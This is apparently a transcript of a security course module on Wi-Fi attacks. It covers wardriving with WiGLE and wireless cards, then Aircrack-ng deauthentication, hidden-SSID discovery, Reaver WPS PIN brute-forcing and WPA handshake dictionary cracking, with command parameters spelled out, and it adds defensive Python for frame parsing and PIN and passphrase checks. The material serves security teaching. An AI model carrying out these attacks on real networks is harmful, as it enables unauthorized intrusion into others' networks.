just drive down here a bit and see what we can pick up. 117, new Wi-Fi 16, new cell zero, from 41.6
feet. 9:55 a.m., battery 26%. Now, normally, when you're wardriving, you want to stay at a pretty low
speed, under 35 miles an hour, just because you need time for the device to pick up those access
points as you're driving by. If I was doing this on a freeway, it wouldn't make any sense, unless I was
trying to pick up the Wi-Fi access point off of a car, which, cars are now coming with wireless internet
on them. Now, the cool thing about WiGLE too is it links in to Google Maps, so I'll be able to actually
see this in a Google Map environment. That's what makes it really easy for me to share
information and also for me to, if somebody's already hit this area, it makes it easy for me to see
what's going on or what my possible targets would be. So a lot of people think, "Well, it's my
wireless "access point. "Who really cares about my home network?" Again, you have to remember,
the goal of the attacker is not necessarily to get a hold of your information but maybe also get a hold of
your resources. I have a good friend of mine who has a dog, and the dog did not bark hardly ever at
all. And one night, he woke up, and the dog was just barking like crazy. And he went to go see what
the dog was barking at. The dog was looking out the front window. So he looked out the window, and
what he saw was a car with two individuals inside, and because it was dark, it was like two in the
morning, he saw a glow, kind of like what you'd see in the movies, of a laptop, and he thought to
himself, "Why are people in front of my house with a laptop?" And because he's an IT, he went, "Oh,
crap." So he ran downstairs. He unplugged his wireless network. And about 15 seconds later, sure
enough, they drove off. And I'm really glad that he didn't recognize me. So remember, you're a
number. You're a resource to attackers. I don't care if you have a bazillion dollars in the bank or if
you've got five dollars in the bank. I'm going to get at you somehow. Okay, so I've driven about a
mile, and not just in one direction. I've actually weaved in and out throughout this neighborhood
here. And within the one-mile distance that I traveled, I have 103 access points. I guarantee, there's
not 103 homes in this environment. One of the things-- 107 new Wi-Fi, 105 new cell zero, from 1.3 miles, 10:02 a.m., battery 24%. Let me turn off the audio here. And so, one of the things I want to do is you can see here that I've got a couple of different access points. And one of them that I'm kind of interested in here is the one that says, "Netgear Guest." Now, as far as these icons are concerned, you'll see these fluctuating a bit here, the green ones tell me that they're locked down. The red ones would represent then an open access point. Now, a lot of people realize that it's open, and what they rely on is something called MAC filtering, which we've talked about in previous modules. That MAC filtering is not a secure way of securing down your network, because all I have to do is tell my tablet or my laptop to be the same MAC address that has access to the access point, and I'm going to pwn you. So you can see here, we've got like Flying Dutchman, I've got Honey. Oh, there's
a MyQuest. There's a Buffalo Jean, which is probably a Buffalo router. There's Netgear Guest. Again,
that's one I want to take a look at probably. That one happens to be WPA-enabled and locked
down. There's also a Belkin one listed here. It's going in and out. The reason why it's going in and out
is because I'm not quite close enough to sync in. So I'm going to drive up here a little bit further and
see if I can lock in to a better target. Okay, so I'm coming up on one here. It's called Linksys. Gee, I
wonder what access point that is. So you'll notice it's in red. If I click on it, it opens it up in Google
Maps as well as gives me some additional feedback as far as the signal strength. It gives me the MAC
address of the device. And by the way, this application, if you think hiding your SSID is going to stop
me, it'll look at those, too. It'll discover those as well. And you could see here, I also have an ability to
connect. I don't have permission to connect to the network because that would be illegal, so I'm going
to cancel that. But if I was doing something malicious, I would obviously look in, and I would probably
be able to see some of their devices they have on their network. So what's really nice is with
WiGLE.net, what they've done is they've taken advantage of what Google has done. Google, if you guys
all know, when they do their little Google car that goes around and gets street view, Google was
actually capturing Wi-Fi access points. And that's one of the things that I can do with my Android
device, is I can say, "Please help me find where I'm at via GPS, "as well as help me triangulate via access
points." Well, because of that, what you're seeing on the map here shows me the address of what a
combination of my signal strength plus what Google Maps had mapped out for me already. Now, this
application in tablet mode doesn't allow me to actually fully connect in. If I had my laptop, I would be
able to just pop right in. The other thing I can do here with this application is I mentioned that it's an
open project. If I go back here, I have this button up at the top left that says, "Upload to WiGLE.net,"
which allows me to upload what I've discovered to the network, as well as I can download what other
people have discovered in the area or kind of clean up I guess the records, if somebody hasn't been
out here in a while. And it allows us to then... I'm going to go ahead and click on my little world map
here. You can see all the access points and where they're located here. So you can see, there's a couple
of Netgear access points. Typically, the question then comes up, "Dale, how do I protect myself from this?" You can't. It goes back to that aspect of, "I know the danger, but I'm willing to accept the danger for the payoff." Just like, "I know the danger of driving a car. I have a really high risk of getting in a car accident, obviously the more I drive my car. But I'm willing to take on that risk. I know about other drivers. I protect myself hopefully from other drivers by driving defensively." So as IT security specialists, we need to make sure that we take advantage of every single feature that different routers offer, and you should research your routers, find out which ones are more vulnerable than others. But we need to look at each one of those features and use every single feature because, again, remember, you can't stop an attacker. Your job is to slow them down.
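The GPS mapping step above, as an added example that is not from the course: a Python estimate of where an access point sits from RSSI-tagged GPS readings, the same kind of data a wardriving app like WiGLE records as you drive by. The coordinates and signal readings are constructed, and the RSSI-weighted centroid is a simple approximation chosen here, not WiGLE's own method; the same readings tell a defender how far their own SSID is audible from the street.

```python
import math

# Constructed wardrive readings for one BSSID: (latitude, longitude, RSSI in dBm).
# Not a real capture; the four points surround a hypothetical AP at (40.8894, -112.0645).
OBSERVATIONS = [
    (40.8890, -112.0645, -55),
    (40.8898, -112.0645, -65),
    (40.8894, -112.0640, -60),
    (40.8894, -112.0650, -70),
]

EARTH_RADIUS_M = 6371000.0


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two WGS84 points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def rssi_weight(rssi_dbm):
    """dBm is logarithmic; convert to linear power so a -55 dBm reading counts
    ten times more than a -65 dBm one (stronger signal means closer to the AP)."""
    return 10 ** (rssi_dbm / 10.0)


def estimate_ap_position(observations):
    """RSSI-weighted centroid of the readings: a rough AP location."""
    if not observations:
        raise ValueError("need at least one reading")
    total = sum(rssi_weight(r) for _, _, r in observations)
    lat = sum(la * rssi_weight(r) for la, _, r in observations) / total
    lon = sum(lo * rssi_weight(r) for _, lo, r in observations) / total
    return lat, lon


def audible_radius_m(observations):
    """Farthest reading from the estimated AP position, i.e. how far out on
    the road the network was still heard (a defender's site-survey number)."""
    lat, lon = estimate_ap_position(observations)
    return max(haversine_m(lat, lon, la, lo) for la, lo, _ in observations)


if __name__ == "__main__":
    lat, lon = estimate_ap_position(OBSERVATIONS)
    print(f"estimated AP position: {lat:.5f}, {lon:.5f}")
    print(f"heard up to {audible_radius_m(OBSERVATIONS):.0f} m from that point")
```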

Wireless Traffic Analysis

Okay, so we've gone through and discovered our wireless networks. We've used our GPS mapping to
get their locations. The next step is then going through and doing wireless traffic analysis and
determine any vulnerabilities that may be in this network. And we're going to do this a couple of
different ways. The first thing that we'll do is actually look for vulnerabilities. And this can be done just
like we normally do on our wired networks. And again our whole purpose here is to determine an
appropriate strategy for attacking the network. The other thing too here that you need to
remember, and I've mentioned this a couple of times, is that again this is wireless, so the traffic itself is
just flowing through the air, and it isn't serialized, which makes it extremely easy to sniff and
analyze the packets. The next step of attack is then going through and doing a little bit more in-depth
reconnaissance. We'll be looking for SSIDs, whether they're hidden or being broadcasted. We'll also
take a look at access points, how many are there. We'll try to discover the encryption being utilized, as
well as the authentication that they're trying to use. Now, some folks ask, "Well, Dale, why do we
need "to know how many access points they have?" Well, twofold. First of all, it gives us a kind of a
layout of the network infrastructure itself. But more importantly, I'm going to be looking to see if all
the access points have been patched. A lot of times, especially when companies have multiple access
points, they may do firmware upgrades for one or two, and they forget one. That could be my door into your network. And there's even more cool tools out there that will help us to determine all these reconnaissance requirements or issues. Those include things that we've seen already, including Wireshark, 'cause, again, packets are just going through the network. Wireshark can sniff that out. And we might need some additional plugins. We'll talk about one of the more popular ones here a little bit later on. But we also have some very specific products out there for wireless, including AirMagnet, OmniPeek, and AirSnort. We interrupt this program to talk to you about "cards." No, not these type of cards. I'm talking about wireless cards. When you're trying to implement an attack against a network
via Wi-Fi, choosing the right Wi-Fi card is extremely important because some applications won't work
correctly, or I should say they only work correctly with certain types of cards. And it also depends on
what the attacker is trying to accomplish. For example, by default, Windows can listen on the network
but doesn't have the capability of injecting data packets, where Linux actually has the ability to inject
and listen. Boy, that looks like a painful-looking picture. So when it comes to cards and your choice of
cards, you need to understand a couple of things. First of all, there are two manufacturers of a
card. There is the manufacturer of the brand of card and then there's the manufacturer of the
chipset of the card. Knowing the card manufacturer and model isn't necessarily enough information
to choose your Wi-Fi card. You've got to know about the chipset. Now, a lot of manufacturers don't
like to reveal their chipsets, but don't worry, it's very easy to determine a chipset. You can simply do a
search on the internet. You can look at the Windows driver file names, because often, the driver name
itself has the chipset in it. You can check the manufacturer's page and really drill into the specs of the
card. And the other thing you need to be careful about is that many times, the manufacturer of a
card will change the chipset while keeping the same model number. So in some cases, I've seen folks
actually pop the covers off so they can actually look at the chips. Often the chipset number can be
seen directly or is printed directly on the chipset itself. Now, you also want to verify the chipset
capabilities. What I mean by that is if the chipset is not compatible with the operating system, or it
doesn't meet the requirement of the application, it may be of no use to you. You'll also want to make
sure that drivers are available. You also want to determine if the drivers had been updated or if they're
available for the different operating systems, especially when it comes to Linux. Now, one of the more
famous cards out there was an old PCMCIA card that was called the ORINOCO Gold card. In this case
here, you can see that the manufacturer was Proxim, but the chipset was ORINOCO. And the reason why it was so popular is you probably can't see it, but down there where it has the name Proxim on
the far left, there's a little cap, and that cap could be used to attach an external antenna such as a
Yagi. Back in my day, I actually had one of these that I plugged into my HP iPAQ. Now, go figure. I was
able to sniff networks with miniStumbler, a Yagi, and this card. It was really quite cool. Now, one of
the more popular products out there is referred to as AirPcap. AirPcap is actually an adaptor. You like
the ominous look there? It's because they're the big boys in the block. You don't mess with
them. They're extremely cool. The product is extremely cool. It allows me to sniff packets and link it
directly into Wireshark if I want to. The downside to it is it's not cheap, but cheap is a relative term. The adapters themselves, there's different models, but they range anywhere from about $300 up to about $2500. And they're simply a little USB adapter that you plug in. Now, with this adapter, an attacker could configure it to decrypt a WEP-encrypted frame. Now, if monitoring a single channel isn't enough, again, depending on the model, you have a multi-channel adapter, as well as you can plug multiple AirPcap adapters into the same machine, so you could capture different frequencies if you'd like. Again, depending on the card that you pick up, it also has the ability to do injection. Again, by default, we mentioned that Windows doesn't have that capability. But adding an AirPcap card, I can
definitely overcome that. It also has a lot of support for third party applications including Cain & Abel,
Wireshark, and Aircrack-ng. But wait, there's more! It also includes an AirPcap software
distribution that replays 802.11 network traffic that's inside of a trace file, so you can always do a
replay. Obviously, that requires a little bit more money. "But, Dale, is there an alternative out
there?" There's really not. There were some rumors of a company called Acrylic that is working on a
competitive product, but AirPcap kind of pretty much owns this market. You may want to check with
Acrylic after watching this video, in case they've come out with that product. Last I heard, it was in
beta.

Launching Attacks

Okay, so you're ready to start launching the attack, right? Well, in order for us to accomplish this, you
can use probably one of the most powerful tools out there right now. It's called Aircrack-ng. And
Aircrack-ng is not just a simple application. It's a suite of applications that's designed to really target
in on the wireless environment. "Dale, when you say 'a suite,' what do you mean by that?" Well, there
are several different products inside of this particular product, and it's open source. And what's really
cool is that it's basically free. It's released under the GNU General Public License. Now, when we talk about Aircrack-ng, there are several different products within it, one of them being Airbase-ng. This is designed to go through and capture WPA as well as WPA2 handshakes, and it can act as an ad hoc access point. There's also, of course, Aircrack-ng itself. This is the standard WEP and WPA/WPA2-PSK cracking tool. There's also Airdriver-ng. Yeah, I tried to say that one fast. Now, Airdriver-ng is actually deprecated out of the latest version of Aircrack-ng. As well as Airdrop-ng. This is a program that we can use to issue de-authentication attacks or to break that connection between the client and the access point. There's Aireplay-ng. This is designed to create traffic and fake authentication packets, as well as request injections. There's also Easside-ng. This is a nifty little tool that allows you to communicate via WEP encryption with an access point without knowing the WEP
key. Other tools include Airodump-ng. This utility is used to do packet capturing. It also has the ability
to link in with a GPS receiver if you have one hooked up. There's also Airgraph-ng, which basically goes
through and maps out, or I should say, creates graphs based off your Airodump CSV files, allowing you
to see things like client to access point relationships. There's Airolib-ng, which is another utility that's
designed to store and manage password lists, ESSID lists, and then try to compute their Pairwise
Master Keys and use them in a WPA/WPA2 cracking session. We also have Airserv-ng. Airserv-ng is a
wireless card server that allows multiple wireless applications to independently use the wireless
card in a client server connection. I bet you can't guess what Airmon-ng does. Yeah, you're right. We
use it to enable the wireless NIC card to start monitoring the wireless interface in looking for different
access points. Airtun-ng is a virtual tunnel interface creator, and it has two different functions. One, it
can allow all encrypted traffic to be monitored for the purpose of using it as a wireless
intrusion detection system, but it can also inject arbitrary traffic into the network. But wait, there's
more! We also have Packetforge-ng. Anybody want to take a stab at that one? Yup, it's used to create
encrypted packets and inject them into the network. We also have Tkiptun-ng. Now, this particular utility, at least as far as the time when this course was recorded, hasn't been finalized yet, but it's a utility that's used to inject some frames into a WPA TKIP network with QoS or quality of service. There's Wesside-ng. "Why do you teach this? There's a war going on." Okay, sorry about that. I stepped into my Broadway musical, West Side Story mode there for just a second (laughs). Well, Wesside-ng has several different techniques that it can utilize to obtain a WEP key in just a couple of minutes. And there's WEP de-cloaking. Now, there's got to be either a Star Trek reference or a Harry Potter reference here. So, this is a utility that actually removes WEP cloaking from a pcap file. Some wireless intrusion prevention systems actively try to prevent the cracking of a WEP key by inserting what we
refer to as "chaff." Basically, it's a fake WEP frame. Now, if you're familiar with the military aspect of
chaff, it's kind of the same concept. An aircraft carries chaff rounds which when a missile locks on to
them, they shoot those off. And it's basically lots of foil or pieces of metal that are designed to confuse
the missile. So in this case, the chaff is implemented and added into the air to kind of fool programs like
Aircrack-ng. Now, there are some rare cases where if the cloaking fails, the key can be recovered
without removing the chaff. But in cases where the key cannot be recovered, we can then use this
tool to filter out that chaff. Then we have something called Airdecap-ng. This is what happens when
you're out in the baseball field with your baseball hat on, and a gust of wind... Ah, never mind. This
utility allows you to decrypt WPA2, WPA, and WEP captured files. Now, some of these programs you
may never use within the Aircrack-ng suite. I just want you to understand that because it has so many
utilities inside of it, you could say it's a "sweet suite." You get it? See how I played on that one?

Let's Go Look-ng

So let's take a look at how we could use Aircrack-ng to find hidden SSIDs, because everybody always
tells me, "I'm hiding my SSIDs so nobody can find me." Well, guess what, I can. Now, I need to
apologize. I really, really wanted to be able to demo this slide for you guys, but because our machines,
our Kali Box, is virtualized, there's no way to pass through a USB wireless NIC card as a wireless NIC
card. It gets picked up as a standard ethernet card. So you won't be able to do this in your own virtual
machines, nor was I able to do it on mine. You would need a full outright deployment of Kali running
on your laptop or PC. But I am going to show you what you would type and the responses that you
would see. So the first thing we'd want to do from a command prompt is we'd want to type in the
Airodump-ng at WLAN1, or it could be WLAN0. It just depends on where your wireless NIC is. And we
would see a readout that would be something similar to this. Let's let this finish typing out here for
you. Now, you could see that one of the devices we found has a hidden SSID because look at the
ESSID. It says the length is six, which means that it's the number of letters in the SSID. Now, sometimes,
we may not see the number, but the length doesn't really matter to me. What matters here is I've got
an access point or a device that's not identifying itself with an ESSID, which tells me that it's
hidden. Now, in order to discover what it is, all we have to do is do a de-authorization on the client. And
when the client re-authenticates, it'll send the ESSID through the air, allowing us to take a look at
it. Now, before we go to the next step, I want to make sure I make a note of, in particular here, the
channel of this device. You'll notice that it's on channel six. And there's my BSSID, which is the
28EF01353485. So you make a note of those. Let's run our Airodump program again with a couple of
parameters to help us filter some stuff out. The first switch is a -"c," which specifies the
channel, because I don't want to be hitting everybody. I'm then going to specify the BSSID, which,
again, is that address we saw previously. Again, remember, ending in 85. And then, finally, what
network interface I'm using, which in this case here is WLAN1. And the results I would get back would
look something like this. Now, this looks very similar to what we saw before, except where we focused
it again on a particular BSSID, but here at the bottom, you can see that it's actually associated to a
client machine that has the MAC address of the 28EF01234567. So, our next step is to make that
machine lose connectivity to the access point. Remember, our goal here is to make this client
machine re-associate so we can see the SSID. And how we're going to do that is to use the Aireplay-ng
command with also some parameters. Let me explain these to you as they type out. The first one is a
"-0," which represents the attack mode. In this case here, a zero is a de-authentication attack. The
next number, in this case here, 30, represents the number of de-authentication attempts I want to
push at the target. In this case, I'm going to throw 30 of them. The "-a" followed by the MAC address is
the target access point, followed by a "-c," which, yup, you got it, is the target client access point. And
then, of course, the line connection that I'm going to cross. Now, at this point, you'd want to switch
back over to your terminal window that has Airodump still running in it. And you would see something
like this. You can see here that it caught the name of the SSID being called "hacked" during its re-
authentication. "Easy schmeezy, Dale." I know. It's actually kind of scary. Actually, there are several
different programs out there that do this for you automatically, as you're looking for Wi-Fi
connections. NetStumbler does this in the background, as well as WiGLE.net. So we've got the
SSID. The next thing we need to do is look at cracking the encryption, right?
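Seen from the defender's side, the sequence just described leaves two very recognisable traces in the air: a beacon whose SSID element is empty or NUL-filled (the `<length: 6>` that airodump-ng prints), and a burst of deauthentication frames aimed at one client. The following Python is an added example, not code from the course or from the Aircrack-ng suite; it parses hand-built 802.11 management frames with nothing but the standard library, flags the hidden beacon, shows the name turning up in a later probe response from the same BSSID, and counts deauths per BSSID the way a wireless IDS would. The frames themselves, the reason code 7 and the burst threshold are constructed for the example; the MAC addresses are the ones from the lecture screenshots.

```python
import struct
from collections import Counter

# Management-frame subtypes from the 802.11 frame control field
SUBTYPE_PROBE_RESP = 5
SUBTYPE_BEACON = 8
SUBTYPE_DEAUTH = 12


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(part, 16) for part in text.split(":"))


def build_mgmt_frame(subtype: int, da: str, sa: str, bssid: str, body: bytes) -> bytes:
    """Minimal management frame (no FCS): frame control, duration, addr1/2/3, seq ctrl, body."""
    frame_control = bytes([(subtype << 4) | 0x00, 0x00])  # version 0, type 0 = management
    return frame_control + b"\x00\x00" + mac_bytes(da) + mac_bytes(sa) + mac_bytes(bssid) + b"\x00\x00" + body


def beacon_body(ssid: bytes, interval: int = 100) -> bytes:
    """Fixed fields shared by beacons and probe responses (timestamp, interval,
    capability) followed by the SSID information element (element ID 0)."""
    return struct.pack("<QHH", 0, interval, 0x0411) + bytes([0, len(ssid)]) + ssid


def parse_ssid_element(ies: bytes) -> dict:
    """Walk the tagged elements; a zero-length or all-NUL SSID is a hidden network."""
    pos = 0
    while pos + 2 <= len(ies):
        eid, elen = ies[pos], ies[pos + 1]
        value = ies[pos + 2:pos + 2 + elen]
        if eid == 0:
            if elen == 0 or value == b"\x00" * elen:
                return {"ssid": None, "hidden": True, "ssid_length": elen}
            return {"ssid": value.decode("utf-8", "replace"), "hidden": False, "ssid_length": elen}
        pos += 2 + elen
    return {"ssid": None, "hidden": True, "ssid_length": 0}


def parse_mgmt_frame(frame: bytes) -> dict:
    if len(frame) < 24:
        raise ValueError("frame too short for an 802.11 MAC header")
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0:
        raise ValueError("not a management frame")
    info = {"subtype": (fc >> 4) & 0xF, "da": mac_str(frame[4:10]),
            "sa": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22])}
    body = frame[24:]
    if info["subtype"] in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP):
        info.update(parse_ssid_element(body[12:]))  # skip the 12 fixed bytes
    elif info["subtype"] == SUBTYPE_DEAUTH:
        info["reason"] = struct.unpack("<H", body[:2])[0]
    return info


def learned_ssids(frames) -> dict:
    """BSSID -> SSID for every beacon or probe response that carried a real name."""
    names = {}
    for frame in frames:
        info = parse_mgmt_frame(frame)
        if info["subtype"] in (SUBTYPE_BEACON, SUBTYPE_PROBE_RESP) and not info["hidden"]:
            names[info["bssid"]] = info["ssid"]
    return names


def deauth_bursts(frames, threshold: int = 10) -> dict:
    """BSSIDs that sent at least `threshold` deauthentication frames (a WIDS-style alert)."""
    counts = Counter()
    for frame in frames:
        info = parse_mgmt_frame(frame)
        if info["subtype"] == SUBTYPE_DEAUTH:
            counts[info["bssid"]] += 1
    return {bssid: n for bssid, n in counts.items() if n >= threshold}


# Constructed capture: addresses from the lecture screenshots, reason code 7 chosen for the example
AP = "28:ef:01:35:34:85"
CLIENT = "28:ef:01:23:45:67"
BROADCAST = "ff:ff:ff:ff:ff:ff"
SAMPLE_FRAMES = (
    [build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, AP, AP, beacon_body(b"\x00" * 6))]    # hidden beacon
    + [build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, struct.pack("<H", 7))] * 30    # deauth burst
    + [build_mgmt_frame(SUBTYPE_PROBE_RESP, CLIENT, AP, AP, beacon_body(b"hacked"))]  # name leaks here
)

if __name__ == "__main__":
    print(parse_mgmt_frame(SAMPLE_FRAMES[0]))
    print(learned_ssids(SAMPLE_FRAMES))
    print(deauth_bursts(SAMPLE_FRAMES))
```

The point of the two reporting functions is that hiding the SSID changes nothing for anyone who can watch a client reconnect, while a counter on deauthentication frames per BSSID is a cheap, reliable alarm for the attack that forces that reconnect.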

Cracking Wi-Fi Encryption


So now as an attacker may have gotten unauthorized access to the target network by doing things like
placing rogue APs, evil twins, finding out what the hidden SSIDs are, the next step is to crack the
security that's completely stopping us. Now, how we achieve this totally depends on the encryption
that's being utilized. And there are many tools based off of our requirements. We obviously know
about Aircrack-ng and its suite of tools. On the MAC platform, we have something called KisMAC,
which is basically a playoff of Kismet, which is designed to run on a Linux environment. KisMAC,
though, has the ability to scan networks passively on cards that it supports, like Apple's Airport or
Airport Extreme. It has the ability to crack WEP and WPA keys or other flaws such as weak
scheduling or weak generated keys. It can also, with the right card, do a packet injection. It can draw
area maps of network coverage. It can implement a de-authentication attack. And, besides, who's a
cute little beaver? That is a beaver, right? We also know about Kali Linux which has... Ooh, another
day to use my phrase, It has a plethora of tools. We've just talked about Aircrack-ng, but it's got a ton
of tools as far as wireless cracking is concerned. It also has KillerBee, Bluepot, BlueRanger, RedFang,
Wifi Honey. We could spend hours going over that information. And, of course, if you're on the
Windows platform, good old Cain & Abel also has the ability to do some cracking for us. Now, in the
aspect of Cain & Abel, well, some of these other products, many times we need still that AirPcap USB
dongle to get it to work correctly. I'm sure there's other tools you guys can think of as well. I know
there's, what, L-com wireless security auditor. There's CloudCracker and other online services. But
usually in a Cloud environment, they crack your key. It's like 17 bucks, which really isn't that
expensive, when you think about it. But enough talk. Let me show you what you could do with
Reaver, which is a utility inside of Kali Linux.

Let's See How Much Damage We Can Do!

Now, again, I've got to apologize to you, folks, 'cause I was really looking forward to showing you
this on a live Linux box, but we have that same limitation as far as the wireless NIC is concerned and
getting into a virtual machine. But because I love you, I've done some screenshots to kind of show you
what would end up happening. Let's first take a look at Reaver. Reaver, again, is a neat little utility
that, at its basic element, allows me to actually hack WPA2 via WPS. Now, if you're not familiar with
WPS, this is the nifty little protocol that allows home users who don't know anything about wireless
security and might be intimidated by the magical blue box with antennas on the back of it to be able
to push a button and type in a code on their device to link it in to the Wi-Fi network. The security flaw
here is that the WPS key is burnt in, so what we can do is we could take advantage of this by trying to
recover the WPA's PIN within a couple of hours using just a simple brute force attack. And with the
WPA's PIN, we can then get the network's WPA/WPA2 pre-shared key, which we could then, offline,
crack if we want to. So how do we implement this? It depends on what you know. But at a very basic
level, we could just simply type in Reaver with a "-i" for interface, followed by a "-b" which would be
the BSSID of the target. But you may not know all those things. The first thing you need to understand
is: does the target have WPS enabled? If not, this isn't going to work. We also need to make sure we
know what the BSSID is of the network. So we're going to dip back into our utility belt and break out
the airmon-ng tool again. If you remember, we just simply type in airmon-ng with a start on
WLAN1. Again, this would all depend on if your wireless was WLAN1. It could be WLAN0. But what we
would see as a result is something like this. It does show us some processes that could possibly create
some problems for us. But here at the bottom, you see WLAN1 chipset being Ralink and My Driver. And
you can see that I'm now in monitoring mode. Well, after we've done that, the next step would be then
to type in Airodump-ng with the parameter of mon0. This is simply an alias for WLAN0 in this case to be
in promiscuous mode, meaning it's going to intercept traffic. And my results would give me something
like this. Now, you'll notice here that the built-in 3D94 is using WPA2, so I want to make note of not
only the channel again, I'm always looking at channels, I don't know why, as well as the BSSID, so then
I take that information. And you remember the first statement where we used Reaver? Well, I'm going
to type it in again. But now I know the interface is going to be mon0 followed by a "-b," and then put
in the BSSID. Then I can do a double v here, which is going to give me a very verbose output. And I
would see something like this. I should preface that it might take a couple of hours before I see
something like this. It depends on the key itself. In this case, I was able to crack the PIN in three
seconds because, let's face it, 12345670 is not a very strong PIN. "Yeah, Dale, that's cool, but how
about just hacking the pass code for WPA or WPA2?" Well, in order to do something like that, we can
go back to our suite of Aircrack-ng. Again, the first thing you'd want to do is go through into an
airmon-ng to disconnect from all the wireless networks. And you would see something like this
respond, again, showing your WLAN interface as well as your chipset in your driver. We would then
want to start up our monitoring again by doing our airmon-ng start command. And we would
verify that in fact we did get monitoring mode enabled on, in this case here, mon0. Our next step
would then be to type in Airodump-ng, following by the name of the monitoring interface, in which
case, we would see something like this, which would show us now a list of all of our wireless networks
in our area. So I'm going to be focusing in on this top one here that has D-Link as the ESSID, and the
BSSID ending in D5. My next step is I'm going to then go through and do an Airodump using channel
11 because that's the channel it was on. Its BSSID again ending in D5. And then specifying this neat
parameter called "-w," and then a path statement, followed by, again, mon1B and the network
interface. Now, the "-w" and the file path command specifies where Airodump will save any
intercepted four-way handshakes. In this case here, I'm going to just save it on the desktop. And then
after some time, I should actually see a client machine pop in. And if it doesn't, we can obviously do
the de-authorization attack that we've talked about before. But in this case here, you can see that I've
got a station that's hitting with a MAC address that's ending in 4E. Now, if I switch over to a second
terminal and leave Airodump continually running, this should all look familiar, because the next
step that we did previously is we used Aireplay-ng. Again, we specified the zero, which is the
shortcut for a de-authentication attack. Again, the number two being the number of packets I'd like
to send, followed by the "a" for the access point MAC address or BSSID, and a "-c" for the client MAC
address, and again specifying mon0 for the network interface. When you hit Enter, you're going to get
a response back, and one of the lines you're going to look for is this one: WPA handshake, and the
MAC address of the access point. Schwing! This means that I just captured the four-way
handshake. And the password is now in my directory on my desktop. And from here, the whole process
of cracking that is just on your preferences. The file that's stored on your desktop is going to be called
a .cap file. So, in this case here, I could use Aircrack-ng with a "-a" for attack, and the attack
mechanism will be the number two, not the number of packets. This is the method which in this case
here is a WPA method. The "b" stands for the BSSID of the router, followed by the "w," which is in this
case here, referencing a word list, a dictionary word list. And then the root/desktop/*.cap path is to
use all the cap files in that structure with that attack. Now, the cracking will only succeed if the
passphrase is in the word list that I've specified here. And depending on the length of your word list, it could take you
some time. But eventually, if you're lucky, you might get something like this as your result, showing
you that the pass phrase was discovered, and that the pass phrase is not secure at all. I might
recommend at this point changing someone's password. Now, just because we're not using PCs
anymore doesn't mean that we don't have this capability. As far as mobile cracking is concerned, there
are several products out there that work on both Android and Apple devices. I'm not going to tell you
which ones are the best. Just know that they exist out there, and be aware of them so that when you
are inventorying individual devices, you understand what the software is and what it's designed to
do. Yeah, look at that, they even have a Reaver version for Android. Woo-hoo!
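Two design facts sit underneath both demos above: a WPS PIN is not really an 8-digit secret, and a WPA/WPA2 passphrase is only as strong as its absence from the attacker's word list. The Python below is an added example, not material from the course and not Reaver or Aircrack-ng code. It implements the WPS check-digit rule (which is why 12345670 is a valid PIN and why the search space collapses to roughly 11,000 attempts), and the PBKDF2 derivation that turns SSID plus passphrase into the pairwise master key a dictionary attack is actually guessing, wrapped in a pre-deployment passphrase check a defender can run. The word list, the reuse of the D-Link SSID and the 16-character minimum are constructed assumptions; the password/IEEE pair is the published 802.11i test vector.

```python
import hashlib

# ---- WPS: why an 8-digit PIN is not an 8-digit search ----

def wps_checksum(first_seven: int) -> int:
    """Check digit from the WPS specification: 3*(odd-position digits) + (even-position
    digits) must be 0 mod 10, computed over the first seven digits."""
    accum, pin = 0, first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    """True when the PIN is 8 digits and its last digit is the correct check digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum(int(pin[:7]))


def wps_worst_case_guesses() -> tuple:
    """(attempts needed against the protocol, number of PINs that pass the checksum).
    The registrar acknowledges the first four digits and the last four separately, and
    the eighth digit is derived, so an attacker needs at most 10**4 + 10**3 tries even
    though 10**7 PINs are checksum-valid. This is the reason to disable WPS outright."""
    return 10**4 + 10**3, 10**8 // 10


# ---- WPA/WPA2-PSK: what the word list is being fed into ----

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes), per 802.11i.
    The SSID is the salt, so rainbow tables are SSID-specific; each guess costs
    8192 HMAC-SHA1 calls (two 20-byte blocks of 4096 iterations)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def passphrase_problems(passphrase: str, ssid: str, wordlist, min_len: int = 16) -> list:
    """Defender-side check before a PSK is deployed. min_len is an assumed policy value."""
    problems = []
    if len(passphrase) < min_len:
        problems.append(f"shorter than {min_len} characters")
    if passphrase.lower() in {w.lower() for w in wordlist}:
        problems.append("appears in the word list")
    if ssid.lower() in passphrase.lower():
        problems.append("contains the SSID")
    return problems


# Constructed inputs: a deliberately tiny word list, and the 802.11i test vector
SAMPLE_WORDLIST = ["letmein", "password", "qwerty123", "dlinkdlink"]
IEEE_TEST_PMK = bytes.fromhex("f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

if __name__ == "__main__":
    print(wps_pin_valid("12345670"), wps_worst_case_guesses())
    print(derive_pmk("password", "IEEE") == IEEE_TEST_PMK)
    print(passphrase_problems("password", "D-Link", SAMPLE_WORDLIST))
```

Running the PMK derivation against the IEEE test vector is a useful sanity check that hashlib is doing exactly what the standard (and the cracker) does; the passphrase check is the mirror image of the dictionary attack, applied before the key is ever put on the air.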

Summary
So in this module, we went through and took a look at a lot of stuff. We first went through and took a
look at how to discover Wi-Fi access points or Wi-Fi networks. We also then talked about how we could
zero in on those because there's no physical way to see the wiring of a wireless network. I know that
sounds weird. But we use GPS to help us pinpoint where these networks are located. We also then
